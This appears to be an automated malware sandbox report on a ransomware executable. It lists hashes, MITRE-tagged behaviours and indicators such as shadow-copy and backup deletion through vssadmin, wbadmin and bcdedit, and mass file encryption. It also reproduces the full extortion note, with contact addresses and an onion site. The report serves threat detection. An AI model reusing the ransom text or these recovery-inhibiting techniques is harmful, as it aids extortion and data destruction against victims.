b0c29ba285c7b4c5ff41831278822437bcb05dee70d4cac7f0d1965eddd4fa79

Analysis

max time kernel
120s
max time network
18s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
13-08-2024 09:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5df80f40ad8f77e7574e4dda1629ed60N.exe
Size

333KB
MD5

5df80f40ad8f77e7574e4dda1629ed60
SHA1

4c8b592fc446d284d8eb764d22bbdd16bf32e126
SHA256

b0c29ba285c7b4c5ff41831278822437bcb05dee70d4cac7f0d1965eddd4fa79
SHA512

c12589221a91b8f7172b0356b7217afff1c20a50c381df02beb631cb06daef87090e1d971c8e2324d3ed45aaa2fd1beb4599f232389c1a088e146ad8e0176401
SSDEEP

6144:YemY9cZrt2pF+M9htFl/1M0lpj9G/OaZE8AvInatk1:/9cm+M9vFl/1HrN2natk1

Score

10^/10

defense_evasion discovery evasion execution impact ransomware

Malware Config

Extracted

Path

C:\MSOCache\All Users\How_to_back_files.html

Ransom Note

<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">wQ9kuup0Cdesu5vcGdOgK7niPFwhIUnvthEkT0uU8RzNFPHgjhdGZnuAhwgDDQwLSyJBJ6l9FVBP+gDvGYiFBBBdx8fRZp2ttNq07LcncTOmp0z4EjdOgxymedxaQDD0H0TKjfd06vrKP9Q++9k9OKac9IHYh5V3PnfYvYNULVypFF372/+2XD+Ixy49ngestfTDSP2dmENG6iIBnhuxKC7f6v2lLQEo1rmTpe8u3iUt1813yArtIbbcpuZFmFUpc9ZRcVfHO3a/8Amg7AVxXG9ZL6Wn47Ws8RJM+tpRFQaoyEgcxip5Q//lYwcU+EHk6A7GVeyWNDazHlJWu8GpWyorW85WqRfa4YhbDOoYgchx2jnYFh7T9oa0uRADxfltNDFO2tzaROs5a+tIypRJz0oAIlDGpHaNwTpptqgYbIxiyoMogfFf3bYf7PydDqvSBiz7X6SIGqqrcwHA7cetbHvbT/gTTbTEGLyWDJ+1GtuP/+Ny6H69OPc10yHP12DOhp+89Vuf9kCUUCamxaLlbTKShnsCG67xdJr1dT+U7NWCOKQF5bKbQo41N6BAYNjFnzAV4n/2IQ95nE6y6jBFD62al2XIXoX14zxurZKQez61vi6Wx/aCFz9Zxbw3elszJ11BWe+hMd+hEC6qFCXIgaB0JxAcVOY+jHtEpIpfJrPrrYrOsafomlq7LPHzDNQklqG9yCRcRcsRWsUSpWuH3XaYo0TUydYwzJWqt/7jGJLl/5Q4X4slKOu2nitnW47/UKepk1zVUNgqwkK1yY0FV6kRo5VEerz21RKFOOZ67l/6uViAH6kIKtUJP6nvj0DRNj7DH/+M9ffdwJHkGSULWPDHLCk6u5HLUvLB0NeSYh5BpJeCWchCbcn2RbZWKawsHHUj7T4wiu9v5rKLwKy9sy7fmBzgX9jVl7ra0gm1VsuCcfgWYxfVdKUhkyFHe157gT0B5qtnu71Y2PGyO5DTFmhqBAISOXxz02ZMOjt7EEGHeFLBTF8hIthz71AA/T1sFnUy5NTlOYl3D85qBb/5I+xymWSQARYGcxA7gijjsQ8l0/FROnIfmgFjbSVwCqUTNxhq9+NjgnJ1YXHyvKO4+oDKZDBuM/gEHTVne+yDvepJR32aQaG20oOeSjjv3AzAJLIZbIKK0uHN6oOR2uwl8YJMF6mrMrMUcgGWEr5Cgy8y3YflnPQVjpEDnqIxm60IyKuu9JVYoWvQsYl9xKJkkGeDIHQP/mToIXnIpA3ArF5871Z0LxbyzQk9UJ6X+bN8wQjfDm/eFbuUdWxbLS0QdIekO18RBY1AdKXvNIrvAcHNe8iZfDvNRZzHv1mwsUbs7yYsXJtNuEjg3N36XsGUc62Df6mB1DA+LR+7vCIfzV+kpa4t1e0be5dGXlwEE0FRy7sUNxCpSgZ0MxzdYKRFgmYmxOlikJV/ANOs5BEQy7Jb5hI0Lgvni7JTu2IR41ApNPueaxEXMNRBITQ0ON1OEDQYLiwVqmC8cnd57Fwzongzw5GY08WBlU7x1zoXCR8IAHPsyU4h8+WTJojHt23ITNJtGPG5HAUcmgatGanJ7chH2OHw84cFg1vDhOmc4DdeQgbGyN1hnDYZS/AiLmH+Ic0a+wdPNZE3vNauSUqXUKss712Oeq9O0fZbpq+qVZLRxUMSDgHby7z1buXu3ZUA9JoltZApvZ31bIlFTJCVcAE=</span> <br>  </div> </div>  <div class="tabs">  <div class="tab"> <div id="tab-content1" class="content"> <div class="text">  <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br>  <hr> <b>Contact us for price and get decryption software.</b><br><br> <hr> <b>email:</b><br> <a href="[email protected] ">[email protected] </a> <br> <a href="[email protected] ">[email protected] </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> <p>* Tor-chat to always be in touch: <a href<a href<b> </div> </div> </div>  <b> <b> <b> <span style="font-size: 22px">qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</span> </b><br><br> </b><br>  </div> </div>  </div> </div> </body> </html>

Emails

href="[email protected]

">[email protected]

href="[email protected]

">[email protected]

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2712 created 1412	2712	5df80f40ad8f77e7574e4dda1629ed60N.exe	21

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1456	bcdedit.exe
1352	bcdedit.exe

Renames multiple (7518) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes System State backups 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2680	wbadmin.exe

Deletes system backups 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2780	wbadmin.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\S:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\T:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\A:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\G:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\H:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\N:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\O:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\P:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\Y:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\B:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\I:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\L:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\W:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\Z:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\F:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\R:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\V:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\X:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\E:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\J:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\K:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\M:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\Q:	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened (read-only)	\??\U:	5df80f40ad8f77e7574e4dda1629ed60N.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\it-IT\js\cpu.js	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090781.WMF	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215076.WMF	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287415.WMF	5df80f40ad8f77e7574e4dda1629ed60N.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\How_to_back_files.html	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ApothecaryLetter.dotx	5df80f40ad8f77e7574e4dda1629ed60N.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\How_to_back_files.html	5df80f40ad8f77e7574e4dda1629ed60N.exe
File created	C:\Program Files\Microsoft Games\Solitaire\de-DE\How_to_back_files.html	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+10	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Algiers	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SONORA\THMBNAIL.PNG	5df80f40ad8f77e7574e4dda1629ed60N.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATER\How_to_back_files.html	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18221_.WMF	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Common Files\System\ado\msado28.tlb	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-execution.xml_hidden	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Antarctica\Casey	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Amman	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Windows Media Player\en-US\WMPDMC.exe.mui	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CAPSULES\THMBNAIL.PNG	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Common Files\System\ado\msado27.tlb	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR9F.GIF	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD07831_.WMF	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar	5df80f40ad8f77e7574e4dda1629ed60N.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\How_to_back_files.html	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\ARCTIC.INF	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Windows Sidebar\en-US\Sidebar.exe.mui	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Windows Sidebar\es-ES\sbdrop.dll.mui	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\css\settings.css	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_left.png	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18228_.WMF	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21323_.GIF	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\TAB_ON.GIF	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\DVD Maker\Eurosti.TTF	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zurich	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Indian\Kerguelen	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\it-IT\FreeCell.exe.mui	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02074_.GIF	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Austin.thmx	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\QP.DPV	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\South_Georgia	5df80f40ad8f77e7574e4dda1629ed60N.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\PROPLUS\How_to_back_files.html	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME16.CSS	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GostTitle.XSL	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGN.XML	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\1100.accdt	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\init.js	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\drag.png	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Urumqi	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport_mask_right.png	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\weather.css	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api	5df80f40ad8f77e7574e4dda1629ed60N.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\How_to_back_files.html	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaremr.dll.mui	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\accessibility.properties	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Stationery\1033\PINELUMB.HTM	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis.css	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_ButtonGraphic.png	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\hu.pak	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar	5df80f40ad8f77e7574e4dda1629ed60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00176_.GIF	5df80f40ad8f77e7574e4dda1629ed60N.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5df80f40ad8f77e7574e4dda1629ed60N.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5df80f40ad8f77e7574e4dda1629ed60N.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
432	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

pid	Process
2852	taskkill.exe
2252	taskkill.exe
1284	taskkill.exe
2288	taskkill.exe
1164	taskkill.exe
2868	taskkill.exe
2616	taskkill.exe
1096	taskkill.exe
1712	taskkill.exe
668	taskkill.exe
2556	taskkill.exe
2636	taskkill.exe
2060	taskkill.exe
2396	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe
2712	5df80f40ad8f77e7574e4dda1629ed60N.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

description	pid	Process
Token: SeDebugPrivilege	2868	taskkill.exe
Token: SeDebugPrivilege	2636	taskkill.exe
Token: SeDebugPrivilege	1096	taskkill.exe
Token: SeDebugPrivilege	1712	taskkill.exe
Token: SeDebugPrivilege	2060	taskkill.exe
Token: SeDebugPrivilege	2852	taskkill.exe
Token: SeDebugPrivilege	1284	taskkill.exe
Token: SeDebugPrivilege	2396	taskkill.exe
Token: SeDebugPrivilege	668	taskkill.exe
Token: SeDebugPrivilege	2252	taskkill.exe
Token: SeDebugPrivilege	2556	taskkill.exe
Token: SeDebugPrivilege	2288	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1444	WMIC.exe
Token: SeSecurityPrivilege	1444	WMIC.exe
Token: SeTakeOwnershipPrivilege	1444	WMIC.exe
Token: SeLoadDriverPrivilege	1444	WMIC.exe
Token: SeSystemProfilePrivilege	1444	WMIC.exe
Token: SeSystemtimePrivilege	1444	WMIC.exe
Token: SeProfSingleProcessPrivilege	1444	WMIC.exe
Token: SeIncBasePriorityPrivilege	1444	WMIC.exe
